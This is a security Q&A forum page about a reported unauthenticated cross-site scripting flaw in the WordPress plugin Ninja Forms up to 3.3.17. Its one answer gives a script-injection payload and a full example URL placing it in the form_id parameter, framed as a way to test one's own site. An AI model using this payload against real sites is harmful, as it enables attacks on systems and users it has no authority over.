Remember

Register

Techbypass Let's Bypass

Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

Questions
Unanswered
Tags
Users
Ask a Question

Need any help mail to [email protected]

One million actively installed WordPress Plugin Ninja Forms <= 3.3.17 is vulnerable to XSS.

+1 vote

Ninja Forms <= 3.3.17 is vulnerable to Unauthenticated Cross-Site Scripting. How can I check this?

ninja-forms
vulnerability
cross-site
scripting
xss

asked May 12, 2019 by anonymous

Please log in or register to answer this question.

1 Answer

0 votes

You can check your site is vulnerable or not by inserting the payload

"><script>alert(document.domain);</script>

in the "form_id" parameter like this.

http://wordpresssite/wp-admin/edit.php?post_status=all&post_type=nf_sub&form_id=1"><script>alert(document.domain);</script>&nf_form_filter&paged=1

answered May 12, 2019 by codeshikari (277 points)

Please log in or register to add a comment.

Security
Cookie Policy

| Snow Theme by Q2A Market

Powered by Question2Answer

...